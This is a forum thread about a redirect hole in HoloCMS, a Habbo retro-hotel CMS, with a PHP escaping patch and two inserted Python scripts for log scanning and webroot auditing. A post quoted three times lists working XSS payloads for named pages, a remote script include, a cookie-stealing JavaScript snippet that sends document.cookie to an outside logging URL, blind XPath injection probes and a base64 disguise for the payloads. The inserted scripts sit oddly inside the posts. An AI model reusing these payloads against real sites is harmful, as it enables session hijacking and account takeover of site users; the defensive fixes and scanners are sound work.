HoloCMS me.php redirecting exploit fix

Page 2 of 2 FirstFirst 12
Results 26 to 41 of 41
  1. #26 NitroHabbz (C++ WoW Scripter, joined Mar 2008, 551 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Ricky, filtering metacharacters from user input would fix most of them...

  2. #27 imadj (Valued Member, joined Dec 2007, location: Localhost :] Hack me, 147 posts)

    Re: HoloCMS me.php redirecting exploit fix

    lol Zorex has nothing to do with it...

    Hebbo found this 1 year ago, so, lol

    and finding this was as easy as 123...

    so don't talk crap! (And there were other exploits in the CMS (the CMS is a piece of crap, lol, because of this I released HoloTracker))


    here's a patched XSS injection:

    http://ragehotel.game-server.cc/grou...B%3C/ScRiPt%3E

    just try it :-)

  3. #28 NitroHabbz (C++ WoW Scripter, joined Mar 2008, 551 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Quote Originally Posted by imadj View Post
    lol Zorex has nothing to do with it...

    Hebbo found this 1 year ago, so, lol

    and finding this was as easy as 123...

    so don't talk crap! (And there were other exploits in the CMS (the CMS is a piece of crap, lol, because of this I released HoloTracker))


    here's a patched XSS injection:

    http://ragehotel.game-server.cc/group_forum.php?searchString=--%3E%3CScRiPt%20%0A%0D%3Ealert(XSS)%3B%3C/ScRiPt%3E

    just try it :-)

    Yeah... well wanna explain why my hotel seems to get redirected to "ragehotel.game-server.cc"?

    If Hebbo was doing it... surely he'd redirect it to his crappy v30

    anyway, back on topic.

    Seems that "whoever" is doing it is injecting a meta refresh into config.php and other various files.

    Working on a fix

  4. #29 imadj (Valued Member, joined Dec 2007, location: Localhost :] Hack me, 147 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Hebbo wants it,

    only Hebbo, Am and I have found this...

    Ahh btw, the thingy with redirection etc.: there are various server SQL injections, I can inject a PHP file from which I can edit everything from the server...

    Holo is unsafe to use.

  5. #30 Erlend (something, joined Dec 2007, location: Oslo, Norway, 791 posts)

    Re: HoloCMS me.php redirecting exploit fix

    nice fix :D this pawns them.

  6. #31 TomSpit (RaGEZONE VETERAN, joined Aug 2007, location: United Kingdom, 1,490 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Quote Originally Posted by NitroHabbz View Post
    Yeah... well wanna explain why my hotel seems to get redirected to "ragehotel.game-server.cc"?

    If Hebbo was doing it... surely he'd redirect it to his crappy v30

    anyway, back on topic.

    Seems that "whoever" is doing it is injecting a meta refresh into config.php and other various files.

    Working on a fix

    Great, thanks for this ;)

  7. #32 thijmen (Account Upgraded | Title Enabled!, joined Jul 2006, location: OtakuHQ, 201 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Quote Originally Posted by rickymenier View Post
    more???

    The main exploits that I found are as follows:

    /group_forum.php XSS vulnerability under the POST variable.


    Code:
    http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>
    This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

    Another possible exploit in group_forum.php:


    Code:
    http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>
    This can be used to RFI any JavaScript source that you wish; this can be anything that can be done with JavaScript, including a JS shell.


    Code:
    http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:


    Code:
    var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;
    Would be easier to do that with the xss.js RFI exploit.


    /group_profile.php XSS exploits:

    Like the previous exploits, these ones are just simple JavaScript injections.


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    /index.php XSS exploits:


    Code:
    http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on
    Can be used to craft a custom cookie.


    Code:
    http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on
    /tags.php XSS exploits:

    This time on the GET variable. Same principle as the above exploits though.


    Code:
    http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    /index.php Blind XPath Injection Exploits.

    This exploit is the most damaging. It can be used to drop the entire users database or extract any part that you wish.

    Vulnerable variables are registerCancel and username.


    Code:
    http://site.com/index.php?registerCancel=true'+and+31337-31337='0
    Code:
    http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add
    I will not advance on these exploits; if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

    How a hacker can hide these vulnerabilities from you:

    Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    Take this bit of the code:

    HTML :
    Code:
    <script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#
    Base64 encoded will be the following:


    Code:
    PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    And simply replace that with added parameters so that the server knows that it is Base64:


    Code:
    http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.
    Nice stolen.
    Give credits to the one who needs it next time.

    Also.
    With a few .htaccess things, like MentaL stated, should be better.
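
Every payload family thijmen lists above, including the data: URI base64 disguise at the end, leaves a trace in the web server's access log, which is where a hotel admin would look to learn whether any of it has been tried. The scanner below is an added example, not code from the thread or from HoloCMS: it percent-decodes each query parameter both ways (with and without + as space), unwraps a data:...;base64, body so the hidden script tag becomes visible, and matches one marker per payload family. The log lines are constructed, and the client addresses are assumptions.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed access-log lines (not taken from the thread); the query strings
# follow the payload shapes listed above, including the data: URI disguise.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2009:10:00:01 +0000] "GET /group_forum.php?searchString=habbo+events HTTP/1.1" 200
203.0.113.9 - - [01/Mar/2009:10:00:07 +0000] "GET /group_forum.php?searchString=--%3E%3CScRiPt%20%0A%0D%3Ealert(XSS)%3B%3C/ScRiPt%3E HTTP/1.1" 200
203.0.113.9 - - [01/Mar/2009:10:00:09 +0000] "GET /group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+ HTTP/1.1" 200
203.0.113.9 - - [01/Mar/2009:10:00:12 +0000] "GET /index.php?registerCancel=true'+and+31337-31337='0 HTTP/1.1" 200
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3}')

# One marker per payload family from the posts above, checked against every
# decoded form of a value so the base64 disguise does not hide the script tag.
MARKERS = [
    ("script tag", re.compile(r"<\s*script", re.I)),
    ("event handler", re.compile(r"\bon(?:load|error|mouseover|click)\s*=", re.I)),
    ("meta tag", re.compile(r"<\s*meta\b", re.I)),
    ("boolean injection", re.compile(r"\b(?:and|or)\s+[\w'\"-]+=", re.I)),
]

def decoded_forms(raw):
    """Percent-decode with and without '+' as space, then unwrap data:;base64 bodies."""
    forms = {unquote(raw), unquote_plus(raw)}
    for value in list(forms):
        head, sep, body = value.partition(";base64,")
        if sep and head.lower().startswith("data:"):
            try:
                padded = body + "=" * (-len(body) % 4)
                forms.add(base64.b64decode(padded, validate=True).decode("utf-8", "replace"))
            except ValueError:
                pass  # unquote_plus mangles '+' inside base64; the plain form still decodes
    return sorted(forms)

def classify(raw):
    """Return (marker name, decoded value) for the first marker hit, else None."""
    for value in decoded_forms(raw):
        for name, pattern in MARKERS:
            if pattern.search(value):
                return name, value
    return None

def scan_log(text):
    """Return (client ip, script path, parameter, marker) for each flagged request."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, target = match.groups()
        parts = urlsplit(target)
        for pair in parts.query.split("&"):
            key, _, raw = pair.partition("=")
            hit = classify(raw) if raw else None
            if hit:
                findings.append((ip, parts.path, unquote(key), hit[0]))
    return findings
```

Run it over a real access log with `scan_log(open(path).read())`; each hit names the script, the parameter and the payload family so the matching input can be traced to the file that needs escaping.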

  8. #33 qwertynoob (Member, joined Jul 2007, 57 posts)

    Re: HoloCMS me.php redirecting exploit fix

    How to patch those injections?

  9. #34 NitroHabbz (C++ WoW Scripter, joined Mar 2008, 551 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Thijmen

    it wasn't a stolen fix.... :s

  10. #35 Mr. Oni (Member, joined Jan 2009, 86 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Quote Originally Posted by rickymenier View Post
    more???

    The main exploits that I found are as follows:

    /group_forum.php XSS vulnerability under the POST variable.


    Code:
    http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>
    This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

    Another possible exploit in group_forum.php:


    Code:
    http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>
    This can be used to RFI any JavaScript source that you wish; this can be anything that can be done with JavaScript, including a JS shell.


    Code:
    http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:


    Code:
    var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;
    Would be easier to do that with the xss.js RFI exploit.


    /group_profile.php XSS exploits:

    Like the previous exploits, these ones are just simple JavaScript injections.


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    /index.php XSS exploits:


    Code:
    http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on
    Can be used to craft a custom cookie.


    Code:
    http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on
    /tags.php XSS exploits:

    This time on the GET variable. Same principle as the above exploits though.


    Code:
    http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    /index.php Blind XPath Injection Exploits.

    This exploit is the most damaging. It can be used to drop the entire users database or extract any part that you wish.

    Vulnerable variables are registerCancel and username.


    Code:
    http://site.com/index.php?registerCancel=true'+and+31337-31337='0
    Code:
    http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add
    I will not advance on these exploits; if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

    How a hacker can hide these vulnerabilities from you:

    Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    Take this bit of the code:

    HTML :
    Code:
    <script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#
    Base64 encoded will be the following:


    Code:
    PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    And simply replace that with added parameters so that the server knows that it is Base64:


    Code:
    http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.
    Stop leeching. I found these exploits about 3 months ago and they were all fixed. This is the exact same post that I made on numerous forums. Please stop claiming this as your own and stop your fail

  11. #36 Mark1994123 (Account Upgraded | Title Enabled!, joined May 2007, location: Netherlands, 814 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Where can I add all these exploits?

    Mark

  12. #37 !Kevin! (Account Upgraded | Title Enabled!, joined Dec 2008, 544 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Well, almost anywhere in the .php file. I'd rather put them close to the beginning so the coding is less messy.

  13. #38 Mark1994123 (Account Upgraded | Title Enabled!, joined May 2007, location: Netherlands, 814 posts)

    Re: HoloCMS me.php redirecting exploit fix

    I don't understand where I must paste all these exploits! Can someone explain it to me! Or can someone include these exploits in the right .php files?

    Mark

  14. #39 yifan_lu (Account Upgraded | Title Enabled!, joined Jun 2007, location: Next to a computer screen, 692 posts)

    Re: HoloCMS me.php redirecting exploit fix

    Quote Originally Posted by NitroHabbz View Post
    This fix was done by cecer1, so all credits to him for this

    Simply replace the top code snippet with the bottom one in me.php

    This will stop people from redirecting your me.php to porn sites or to their own hotels :)

    PHP Code:
    // Before (vulnerable): the owner name and description reach the page unescaped.
    printf("<li class=\"%s room-occupancy-%s\" roomid=\"%s\">
    <div title=\"Go to the room where this event is held\">
        <span class=\"event-name\"><a href=\"./client.php?forwardId=2&amp;roomId=%s\" onclick=\"HabboClient.roomForward(this, '%s', 'private'); return false;\">%s</a></span>
        <span class=\"event-owner\"> by <a href=\"/user_profile.php?id=%s\">%s</a></span>
        <p>%s (<span class=\"event-date\">%s</span>)</p>
    </div>
    </li>",
    $even, $room_fill, $row['roomid'], $row['roomid'], $row['roomid'], htmlspecialchars($row['name']), $row['userid'], $userrow['name'], $row['description'], $row['date']);


    // After (fixed): every user-controlled string is passed through htmlspecialchars().
    printf("<li class=\"%s room-occupancy-%s\" roomid=\"%s\">
    <div title=\"Go to the room where this event is held\">
        <span class=\"event-name\"><a href=\"./client.php?forwardId=2&amp;roomId=%s\" onclick=\"HabboClient.roomForward(this, '%s', 'private'); return false;\">%s</a></span>
        <span class=\"event-owner\"> by <a href=\"/user_profile.php?id=%s\">%s</a></span>
        <p>%s (<span class=\"event-date\">%s</span>)</p>
    </div>
    </li>",
    $even, $room_fill, $row['roomid'], $row['roomid'], $row['roomid'], htmlspecialchars($row['name']), $row['userid'], htmlspecialchars($userrow['name']), htmlspecialchars($row['description']), $row['date']);
    Yea, I found this when I was recoding me. This was entirely my fault, as I was coding the events thing quickly, so sorry to anyone who got exploited. Also, instead of htmlspecialchars, I would use HoloText() as I wrote that function to be extendable. HoloText() will filter text that is to be displayed (stripslashes, htmlspecialchar, etc) and FilterText() will filter text that is to be inserted into the DB (mysql_real_escape). The great thing about using those functions is if another exploit is found somehow, instead of adding code to every place where user can input, you only have to do so in one place.

    Quote Originally Posted by rickymenier View Post
    more???

    The main exploits that I found are as follows:

    /group_forum.php XSS vulnerability under the POST variable.


    Code:
    http://site.com/group_forum.php?searchString=<img+src=http://badsite.com/c99.gif+onload=alert(Uploaded)>
    This can be used to upload a PHP shell in the form of a .gif file as the script does not secure this kind of attack because the author did not design this for image uploading.

    Another possible exploit in group_forum.php:


    Code:
    http://site.com/group_forum.php?searchString=<script/xss+src=http://badsite.com/xss.js?Uploaded></script>
    This can be used to RFI any JavaScript source that you wish; this can be anything that can be done with JavaScript, including a JS shell.


    Code:
    http://site.com/group_forum.php?searchString=--><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    This will just display a popup saying XSS, but can easily be edited to dump the cookies to a file on your server CHMOD 777. You can do this by inserting the following code:


    Code:
    var http = new ActiveXObject("microsoft.xmlhttp"); http.open("GET","http://yoursite.com/log.php?this="+document.cookie,false); http.send(); return http.responseText;
    Would be easier to do that with the xss.js RFI exploit.


    /group_profile.php XSS exploits:

    Like the previous exploits, these ones are just simple JavaScript injections.


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    /index.php XSS exploits:


    Code:
    http://site.com/index.php?username="+onmouseover=alert(XSS)+&password=111-222-1933email@address.tst&_login_remember_me=on
    Can be used to craft a custom cookie.


    Code:
    http://site.com/index.php?username=>"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>&password=111-222-1933email@address.tst&_login_remember_me=on
    /tags.php XSS exploits:

    This time on the GET variable. Same principle as the above exploits though.


    Code:
    http://site.com/tags.php?tag=%00'"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
    /index.php Blind XPath Injection Exploits.

    This exploit is the most damaging. It can be used to drop the entire users database or extract any part that you wish.

    Vulnerable variables are registerCancel and username.


    Code:
    http://site.com/index.php?registerCancel=true'+and+31337-31337='0
    Code:
    http://site.com/index.php?username=111-222-1933email@address.tst+and+31337-31337=0&password=111-222-1933email@add
    I will not advance on these exploits; if you really feel the need to do these exploits, you should be clever enough to work it out for yourself. I don't want kids running around exploiting every retro with this exploit.

    How a hacker can hide these vulnerabilities from you:

    Like all XSS, a popular method of disguising these exploits from you would be to base64 encode them. For example the following exploit:


    Code:
    http://site.com/group_profile.php?searchString=<script/xss+src=http://badsite.com/xss.js?EXECUTED></script>
    Take this bit of the code:

    HTML :
    Code:
    <script/xss+src=http://badsite.com/xss.js?EXECUTED></script>#
    Base64 encoded will be the following:


    Code:
    PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    And simply replace that with added parameters so that the server knows that it is Base64:


    Code:
    http://site.com/group_profile.php?searchString=data:text/html;base64,PHNjcmlwdC94c3Mrc3JjPWh0dHA6Ly9iYWRzaXRlLmNvbS94c3MuanM/RVhFQ1VURUQ+PC9zY3JpcHQ+
    Just looks like a normal URL? Well imagine what would happen if a user PM'd this to you on your retro and it stole your session and he could then log in as you.
    I'm pretty sure I fixed all these in the new HoloCMS (I filter out all user input-able text now), so check back in a few months when the release is out.

  15. #40 Mr. Oni (Member, joined Jan 2009, 86 posts)

    Re: HoloCMS me.php redirecting exploit fix

    TBH you're a moron if you chmod your files so that they are writeable. You deserve to be hacked
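
NitroHabbz's observation in #28 (a meta refresh injected into config.php and other files) and Mr. Oni's point about writable files above are two sides of one check an admin can run over the webroot. This is an added example, not code from the thread or from HoloCMS, and it goes one step beyond the thread by also flagging an injected header('Location: ...') call; the sample tree it builds is constructed, with hypothetical file contents and an example redirect target.

```python
import os
import re
import stat
import tempfile

# Signs of the tampering described in the thread: a meta refresh or a
# Location header dropped into a PHP file that should never redirect.
REDIRECT_RE = re.compile(
    r"<meta\s+http-equiv\s*=\s*[\"']?refresh|header\s*\(\s*[\"']Location:", re.I)

def audit_webroot(root):
    """Return sorted (relative path, problem) pairs for every .php file under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            # Mr. Oni's point: a file anyone can write is a file anyone can backdoor.
            if os.stat(full).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "group/world-writable"))
            with open(full, encoding="utf-8", errors="replace") as fh:
                if REDIRECT_RE.search(fh.read()):
                    findings.append((rel, "redirect injected"))
    return sorted(findings)

def build_sample_webroot():
    """Constructed sample tree (hypothetical files, not HoloCMS sources)."""
    root = tempfile.mkdtemp(prefix="holo_audit_")
    clean = os.path.join(root, "me.php")
    with open(clean, "w") as fh:
        fh.write("<?php\n$events = getEvents();\nprintf('<li>%s</li>', HoloText($events[0]));\n")
    os.chmod(clean, 0o644)
    # config.php as the thread describes it after tampering: writable, with a
    # meta refresh appended that sends visitors to an example redirect target.
    tampered = os.path.join(root, "config.php")
    with open(tampered, "w") as fh:
        fh.write("<?php\n$dbhost = 'localhost';\n?>\n"
                 "<meta http-equiv=\"refresh\" content=\"0;url=http://other-hotel.example/\">\n")
    os.chmod(tampered, 0o666)
    return root

if __name__ == "__main__":
    for path, problem in audit_webroot(build_sample_webroot()):
        print("%s: %s" % (path, problem))
```

Point `audit_webroot` at the real webroot and run it from cron; a file that shows up with either problem is the one to restore from a known-good copy and chmod back.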

  16. #41 tekriacorp (Member, joined Feb 2009, location: tekria.co.uk, 58 posts)

    Re: HoloCMS me.php redirecting exploit fix

    To tell the truth, anyone could do this without help.


